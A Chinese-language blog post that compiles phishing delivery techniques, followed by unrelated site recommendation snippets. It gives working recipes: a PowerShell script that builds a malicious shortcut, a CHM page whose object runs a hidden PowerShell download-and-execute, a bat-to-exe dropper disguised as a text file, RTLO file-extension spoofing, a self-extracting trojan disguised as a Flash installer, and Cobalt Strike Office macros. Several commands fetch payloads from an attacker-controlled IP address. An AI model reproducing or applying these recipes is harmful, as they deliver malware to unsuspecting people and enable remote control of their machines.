钓鱼姿势汇总

前言

随着钓鱼攻击的流行,赶紧把这块知识补充上。

lnk 快捷方式

简介

lnk 快捷方式放在硬盘上,用来方便使用者快速的调用。

应用

powershell命令快速生成lnk样本
如:a.ps1

$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("Desktop.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,15"  
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c echo (new-object net.webclient).DownloadString('http://106.xx.xx.xx:82/a')"  
$Shortcut.Save()

icon 序号参考 https://help4windows.com/windows_7_shell32_dll.shtml

image.png

当点击Desktop 快捷方式时,就会执行powershell命令。

image.png

文件后缀RTLO

简介

RTLO全名为"RIGHT-TO-LEFTOVERRIDE",是一个不可显示的控制类字符,本质是unicode 字符。"RTLO"字符可使电脑将任意语言的文字内容按倒序排列。

应用

方法一:
对任意文件重命名,右键选择插入unicode控制字符--->RLO ,从右向左显示。

image.png

如输入fdp,从右向左显示即为pdf。
所以aaa.txt 就被重命名为aaatxt.pdf。但看文件属性依然是txt文本。

image.png

方法二:
使用python对文件重命名

import os  
os.rename('apele.exe', 'apele\u202egnp.exe')
image.png

将恶意exe程序伪装为png图片,比较有迷惑性。

CHM文档

简介

CHM(Compiled Help Manual)即"已编译的帮助文件"。它是微软老式帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。

应用

创建index.html文件

<!DOCTYPE html>
<html>
    <head>
        <title>hello</title>
    </head>
    <body>
        This is a test demo!
        <OBJECT id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
            <PARAM name="Command" value="ShortCut">
            <PARAM name="Button" value="Bitmap::shortcut">
            <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://106.xx.xx.xx:82/a')">
        </OBJECT>
        <SCRIPT>
            x.Click();
        </SCRIPT>
    </body>
</html>

使用EasyCHM工具选择编译为CHM

image.png
image.png

编译结束后。点击tmp.chm文件,即可触发powershell命令。

txt 钓鱼

简介

伪造txt文本的恶意程序,来迷惑对方更容易中招。实际上看似是txt文本实际为exe恶意程序。

应用

首先下载Bat_To_Exe_Converter项目
该项目利用bat转为exe,来生成exe恶意程序。
命令如下:

notepad
chcp 1200 & powershell  -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://106.53.97.7:82/a')"
image.png

再加入文本文件的ico图标,然后设置windows 不可见(即在点击是没有窗口执行)。
生成exe恶意程序。

image.png

利用文件后缀RTLO修改为txt后缀。重命名为applexe.txt。看似更加逼真。

image.png

当点击打开带txt文件,程序首先执行notepad打来txt,当关闭时执行powershell恶意代码。

自解压

简介

自解压指的是在没有压缩软件的主机上也可以进行解压的技术,生成的是exe文件。并可以设置在解压时执行某一段程序,这段程序被称为sfx程序。

应用

选择一个360.exe木马程序和一个flash安装程序flashplaye.exe。
选中这两个文件,创建自解压格式压缩文件。

image.png

选择高级---自解压文件选项---常规,填写解压路径C:\windows\temp

image.png

选择高级---设置,设置提取后运行的程序。

C:\windows\temp\360.exe
C:\windows\temp\flashplaye.exe
image.png

选择高级---模式---全部隐藏
选择高级---更新---"解压并更新文件"和"覆盖所有文件"
确定之后,桌面产生Desktop.exe文件。

image.png

此时利用ResourceHacker导出flash的ico图标。

image.png

利用同样的方法打开制作好的自解压捆绑木马,替换flash的图标,确认之后点击文件另存在。重新命名为flashplayerpp_install_cn_32.0.0.371.exe

image.png

当点击该flash进行更新时,就会解压执行360.exe恶意应用程序。

超长文件名

简介

如果文件名的长度大于指定的长度,超过40个字符长度,文件名末尾就会被隐藏。

应用

如下图伪造一个putty程序。

image.png

office宏

简介

宏攻击,是一种古老的攻击手法,在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的宏攻击。

应用

选择Cobalt Strike主界面中attacks--->packages--->ms office macro

image.png

创建宏word。点击 "Word 选项-->自定义功能区-->开发者工具(勾选) "

image.png

点击"开发工具"---"宏",新建宏名,点击创建。添加代码。

image.png

然后另存为启用宏的docm文件。
默认情况下,Office已经禁用所有宏。
这里修改设置为

image.png

当重新打开word文档时,CobaltStrike即会上线。

image.png

待补充

总结

  1. 邮件发送待解压rar文件,使用自解压触发恶意程序;
  2. xss配置flash钓鱼;
  3. 邮件发送word文档、excel表格,嵌入恶意程序;

参考资料

https://paper.seebug.org/1329/#part-2
https://www.shuzhiduo.com/A/QW5YN1oqdm/
https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247485861&idx=1&sn=a4b87208c753c317240c7ae063871cdb&chksm=9b392f14ac4ea60240ca3c84f39f65a3b5584a08dbcf07b6962c3464ae282c3a1003fa3de37a&mpshare=1&scene=23&srcid=0730e0o8JsXU5nKshFt8XOPS&sharer_sharetime=1596118625552&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd
http://45.158.34.4/2020/08/06/gofish/
https://www.anquanke.com/post/id/198540
https://www.sec-in.com/article/847

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 219,490评论 6 508
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 93,581评论 3 395
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 165,830评论 0 356
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,957评论 1 295
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,974评论 6 393
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,754评论 1 307
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,464评论 3 420
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,357评论 0 276
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,847评论 1 317
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,995评论 3 338
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,137评论 1 351
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,819评论 5 346
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,482评论 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,023评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,149评论 1 272
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,409评论 3 373
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,086评论 2 355

推荐阅读更多精彩内容

  • lik link文件,即快捷方式 比如一个txt文件,我们创建一个它的快捷方式,然后修改它的目标地址: 这时可以看...
    book4yi阅读 2,835评论 0 2
  • 近几年杀毒软件泛滥,很多人不知道该如何选择合适的杀毒软件,也许杀毒软件并非是必需的,但这不是今天要谈论的话题,今天...
    yuanfang235阅读 2,782评论 0 2
  • 1:描述tcp/udp的区别及优劣,及其发展前景 TCP 建立连接 完整性强 速度慢—当数据传输的性能必须让位于数...
    Triplesc阅读 1,650评论 0 1
  • WinRAR - 最新版本的更新 版本 5.50 1. WinRAR 和命令行 RAR 默认使用 RAR ...
    王舒璇阅读 2,397评论 0 2
  • 夜莺2517阅读 127,720评论 1 9